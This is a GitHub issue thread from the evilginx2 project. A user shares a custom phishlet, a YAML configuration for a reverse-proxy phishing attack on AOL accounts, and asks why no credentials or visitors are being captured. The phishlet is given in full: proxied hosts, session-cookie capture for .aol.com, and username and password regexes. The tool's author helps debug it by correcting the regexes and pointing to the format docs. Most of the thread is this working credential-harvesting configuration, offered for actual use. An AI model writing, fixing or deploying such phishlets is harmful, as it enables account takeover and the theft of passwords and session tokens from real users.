Phishlets - Githubissues

dmtd2018 commented 6 years ago

I'm made two custom phishlets both of them work fine with redirecting even with logging after fulfilling the login details you got logged successfully to the account. The issue i have is not receiving anything like connections of visitor on the evilginx or any credentials captured.

Thank You in advance

Here is one of the phishlets:

name: 'aol' author: '@dmtd2018' min_ver: '2.1.0' proxy_hosts:

{phish_sub: '', orig_sub: '', domain: 'aol.com', session: true, is_landing: false}
{phish_sub: 'login', orig_sub: 'login', domain: 'aol.com', session: false, is_landing: true}
{phish_sub: 's', orig_sub: 's', domain: 'yimg.com', session: false, is_landing: false} sub_filters:
{hostname: 'aol.com', sub: '', domain: 'aol.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
{hostname: 'login.aol.com', sub: 'login', domain: 'aol.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
{hostname: 's.yimg.com', sub: 's', domain: 'yimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} auth_tokens:
domain: '.aol.com' keys: ['.,regexp'] user_regex: key: 'username' re: '(.)' pass_regex: key: 'password' re: '(.*)' landing_path:
'/'

kgretzky commented 6 years ago

I see that you are missing * in some of the regular expressions. Is it intentional or an issue with paste? For example keys: ['.,regexp'] should be keys: ['.*,regexp']

dmtd2018 commented 6 years ago

It is paste issue i use it exactly how you showed keys: ['.*,regexp']

kgretzky commented 6 years ago

Can you paste again using a code block and verify if it was pasted properly? Otherwise I can't find the real error.

dmtd2018 commented 6 years ago

author: '@dmtd'
min_ver: '2.1.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: 'aol.com', session: true, is_landing: false}
  - {phish_sub: 'login', orig_sub: 'login', domain: 'aol.com', session: false, is_landing: true}
  - {phish_sub: 's', orig_sub: 's', domain: 'yimg.com', session: false, is_landing: false}
sub_filters:
  - {hostname: 'aol.com', sub: '', domain: 'aol.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {hostname: 'login.aol.com', sub: 'login', domain: 'aol.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
  - {hostname: 's.yimg.com', sub: 's', domain: 'yimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
auth_tokens:
  - domain: '.aol.com'
    keys: ['.*,regexp']
user_regex:
  key: 'username'
  re: '(.*)'
pass_regex:
  key: 'password'
  re: '(.*)'
landing_path:
  - '/'

Phoenix1112 commented 6 years ago

user_regex >>> username

pass_regex >> password

is it will change ?

kgretzky commented 6 years ago

I won't explain it better than I already did: https://github.com/kgretzky/evilginx2/wiki/Phishlet-File-Format-(2.2.0)

kgretzky / evilginx2

Phishlets #107